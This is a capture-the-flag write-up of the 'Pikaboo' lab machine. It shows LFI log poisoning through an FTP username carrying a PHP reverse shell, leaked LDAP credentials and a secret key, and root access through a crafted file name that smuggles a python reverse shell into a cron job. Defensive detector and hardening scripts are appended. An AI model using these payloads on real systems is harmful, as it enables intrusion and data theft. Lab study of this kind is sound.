Pikaboo

$ nmap -p- -T4 -A 10.129.141.174
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)
|   256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)
|_  256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Pikaboo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
$ dirb http://10.129.141.174
---- Scanning URL: http://10.129.141.174/ ----
+ http://10.129.141.174/admin.php (CODE:403|SIZE:274)
==> DIRECTORY: http://10.129.141.174/images/
+ http://10.129.141.174/index.php (CODE:200|SIZE:6922)

---- Entering directory: http://10.129.141.174/images/ ----
$ nikto -h http://10.129.141.174
+ Server: nginx/1.14.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8067 requests: 0 error(s) and 14 item(s) reported on remote host

Bypass the nginx configuration issue with /admin../admin_staging/, use the LFI in index.php?page= to read the vsftpd log file, then inject PHP through the FTP username.
http://pikaboo.htb/admin../admin_staging/
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
$ ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://pikaboo.htb/admin../admin_staging/index.php?page=FUZZ' -fs 15349 
/var/log/lastlog        [Status: 200, Size: 307641, Words: 3272, Lines: 368]
/var/log/vsftpd.log     [Status: 200, Size: 19803, Words: 3893, Lines: 414]
/var/log/wtmp           [Status: 200, Size: 167029, Words: 3288, Lines: 559]

http://pikaboo.htb/admin../admin_staging/index.php?page=/var/log/vsftpd.log 
Viewing the FTP log through the LFI in the web page means that if we put PHP code in the FTP username, it is written to the FTP log, and when the LFI includes the log, that PHP code is executed.
kali@kali:~/0.htb/release_arena/Pikaboo$ nc -lvnp 4444
kali@kali:~/0.htb/release_arena/Pikaboo$ ftp pikaboo.htb
Connected to pikaboo.htb.
220 (vsFTPd 3.0.3)
Name (pikaboo.htb:kali): <?php exec("/bin/bash -c 'bash -i  > /dev/tcp/10.10.14.51/4444 0>&1'"); ?> 
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> 
refresh  http://pikaboo.htb/admin../admin_staging/index.php?page=/var/log/vsftpd.log 
kali@kali:~/0.htb/release_arena/Pikaboo$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.51] from (UNKNOWN) [10.129.142.101] 47618
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cat /home/pwnmeow/user.txt
a571ef25b8387baba59bc0e71297087e
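The log-poisoning step above leaves a clear trace: the injected PHP ends up as the user-name field of a FAIL LOGIN record in vsftpd.log. The following shell script, added here as an example and not part of the write-up or the box, scans such records and flags user names that contain a PHP/ASP/template opener or are implausibly long. The log lines in SAMPLE_LOG are constructed in vsftpd's format (pids, timestamps and client address are made up); only the `pwnmeow` name comes from the box.

```shell
#!/bin/sh
# Detector for poisoned vsftpd login records (added example, not from the
# write-up). vsftpd writes the attempted user name inside the second bracket
# pair of each login line; a PHP or template tag there is an attempt to plant
# code in a log that an LFI-capable include could later execute.
set -eu

# Constructed sample lines in vsftpd.log style (not taken from the box).
SAMPLE_LOG=$(cat <<'EOF'
Sun Jul 18 21:33:01 2021 [pid 2342] CONNECT: Client "10.10.14.51"
Sun Jul 18 21:33:05 2021 [pid 2341] [pwnmeow] OK LOGIN: Client "10.10.14.51"
Sun Jul 18 21:34:10 2021 [pid 2350] [anonymous] FAIL LOGIN: Client "10.10.14.51"
Sun Jul 18 21:35:44 2021 [pid 2360] [<?php echo 1; ?>] FAIL LOGIN: Client "10.10.14.51"
Sun Jul 18 21:36:02 2021 [pid 2370] [<%= 7*7 %>] FAIL LOGIN: Client "10.10.14.51"
EOF
)

# poisoned_logins: read a vsftpd log on stdin and print every login line whose
# user-name field contains a code/template opener or is longer than 64 chars.
poisoned_logins() {
  awk '
    / LOGIN: / {
      # the user name sits between "] [" and "] <OK|FAIL> LOGIN:"
      s = index($0, "] [")
      if (s == 0) next
      rest = substr($0, s + 3)
      e = match(rest, /\] (OK|FAIL) LOGIN:/)
      if (e == 0) next
      user = substr(rest, 1, e - 1)
      if (user ~ /<[?]|<%|[$][{]|[{][{]/ || length(user) > 64) print
    }'
}

# count_poisoned_logins: same input, prints only the number of flagged lines.
count_poisoned_logins() {
  poisoned_logins | wc -l | tr -d ' '
}

# Stand-alone run: scan the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | poisoned_logins
```

Run it against the real file with `poisoned_logins < /var/log/vsftpd.log`. Detection is the second line of defence; the durable fix is an include that maps the `page` parameter onto an allowlist of known files instead of an arbitrary path, so that a readable log can never become executable code.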
 
cat /opt/pokeapi/config/settings.py 

DATABASES = {
"ldap": {
"ENGINE": "ldapdb.backends.ldap",
"NAME": "ldap:///",
"USER": "cn=binduser,ou=users,dc=pikaboo,dc=htb",
"PASSWORD": "J~42%W?PFHl]g",
},
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": "/opt/pokeapi/db.sqlite3",
}
}

CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
},
}
}

SECRET_KEY = os.environ.get(
"SECRET_KEY", "ubx+22!jbo(^x2_scm-o$*py3e@-awu-n^hipkm%2l$sw$&2l#"
)

CUSTOM_APPS = (
"tastypie",
"pokemon_v2",
)
ss
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
u_str ESTAB 0 0 * 12535 * 11835
u_str ESTAB 14 0 * 94555 * 95385
u_str ESTAB 0 0 /run/systemd/journal/stdout 13467 * 13069
u_str ESTAB 0 768 /var/run/slapd/ldapi 116233 * 117236
u_str ESTAB 0 0 * 13206 * 13486
u_str ESTAB 14 0 * 117236 * 116233
u_str ESTAB 0 768 /var/run/slapd/ldapi 95385 * 94555
u_str ESTAB 0 0 /var/run/slapd/ldapi 94552 * 95375
... ...
ldapsearch -x -LLL -h 127.0.0.1 -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w J~42%W?PFHl]g -b 'dc=ftp,dc=pikaboo,dc=htb' -s sub '(objectClass=*)' 
dn: dc=ftp,dc=pikaboo,dc=htb
objectClass: domain
dc: ftp

dn: ou=users,dc=ftp,dc=pikaboo,dc=htb
objectClass: organizationalUnit
objectClass: top
ou: users

dn: ou=groups,dc=ftp,dc=pikaboo,dc=htb
objectClass: organizationalUnit
objectClass: top
ou: groups

dn: uid=pwnmeow,ou=users,dc=ftp,dc=pikaboo,dc=htb
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
uid: pwnmeow
cn: Pwn
sn: Meow
loginShell: /bin/bash
uidNumber: 10000
gidNumber: 10000
homeDirectory: /home/pwnmeow
userPassword:: X0cwdFQ0X0M0dGNIXyczbV80bEwhXw==
$ echo X0cwdFQ0X0M0dGNIXyczbV80bEwhXw== | base64 -d
_G0tT4_C4tcH_'3m_4lL!_
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /usr/local/bin/csvupdate_cron
cat csvupdate_cron
#!/bin/bash

for d in /srv/ftp/*
do
  cd $d
  /usr/local/bin/csvupdate $(basename $d) *csv
  /usr/bin/rm -rf *
done
$ touch "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.51\",5555));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"
$ nc -lvnp 5555
listening on [any] 5555 ...
$ ftp pikaboo.htb
Connected to pikaboo.htb.
220 (vsFTPd 3.0.3)
Name (pikaboo.htb:kali): pwnmeow
331 Please specify the password.
Password:_G0tT4_C4tcH_'3m_4lL!_
ftp> cd items
ftp> put *
mput |python -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.51",1234));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")';echo .csv? n
mput |python -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.51",5555));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")';echo .csv? y
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5 bytes sent in 23.09 secs (0.0002 kB/s)
ftp> 

kali@kali:~/0.htb/release_arena/Pikaboo$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.51] from (UNKNOWN) [10.10.14.51] 49354
$ 

kali@kali:~/0.htb/release_arena/Pikaboo$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.51] from (UNKNOWN) [10.129.142.101] 53744
# id
id
uid=0(root) gid=0(root) groups=0(root)
# ls
ls
# pwd
pwd
/srv/ftp/items
# cd /root
cd /root
# ls
ls
root.txt  vsftpd.log
# cat root.txt
cat root.txt
931dbd972124889ce1223fbb56489526
# 
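The root path works because csvupdate_cron passes whatever matches `*csv` in each FTP directory straight to csvupdate, so a file name that begins with `|` is handed to a program that treats it as a command. The script below is an added example of a hardened replacement, not the box's own script. It assumes csvupdate's interface is `csvupdate <category> <file>...` (as the original cron job uses it) and that FTP_ROOT and CSVUPDATE are the only paths involved; both are overridable for testing.

```shell
#!/bin/sh
# Hardened rewrite of the csvupdate_cron job (added example, not the box's own
# script). It keeps the original contract, assumed to be
# "csvupdate <category> <csv file>...", but refuses to hand csvupdate a file
# name that could be parsed as a pipe, an option or a shell fragment.
set -eu

FTP_ROOT=${FTP_ROOT:-/srv/ftp}                     # one subdirectory per category
CSVUPDATE=${CSVUPDATE:-/usr/local/bin/csvupdate}   # consumer of the CSV files

# is_safe_csv_name NAME: return 0 only for a plain basename made of
# [A-Za-z0-9._-], not starting with '.', '-' or '|', and ending in ".csv".
is_safe_csv_name() {
  case "$1" in
    ''|*/*|.*|-*|'|'*) return 1 ;;   # empty, path, hidden, option-like, pipe-like
    *.csv) ;;                        # required suffix
    *) return 1 ;;
  esac
  case "$1" in
    *[!A-Za-z0-9._-]*) return 1 ;;   # any character outside the allowlist
  esac
  return 0
}

# process_ftp_dirs: for each category directory, feed only vetted files to
# csvupdate (with a ./ prefix so the name can only ever be read as a path),
# report the rest, then clear the directory as the original job did.
process_ftp_dirs() {
  for d in "$FTP_ROOT"/*/; do
    [ -d "$d" ] || continue          # an unmatched glob stays literal; skip it
    d=${d%/}
    category=$(basename -- "$d")
    (
      cd -- "$d"
      for f in *.csv; do
        [ -f "$f" ] || continue
        if is_safe_csv_name "$f"; then
          "$CSVUPDATE" "$category" "./$f"
        else
          printf 'csvupdate_cron: rejected suspicious upload %s in %s\n' "$f" "$d" >&2
        fi
      done
      rm -rf -- ./*                  # '--' and './' stop rm from parsing names as options
    )
  done
}

process_ftp_dirs
```

The name check is deliberately an allowlist rather than a blocklist of `|` and `;`: whatever parser csvupdate uses for its argument, a name made only of `[A-Za-z0-9._-]` with a `./` prefix cannot be mistaken for anything but a file. The rejected-upload message on stderr also gives the cron mail (or a journal rule) something to alert on.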
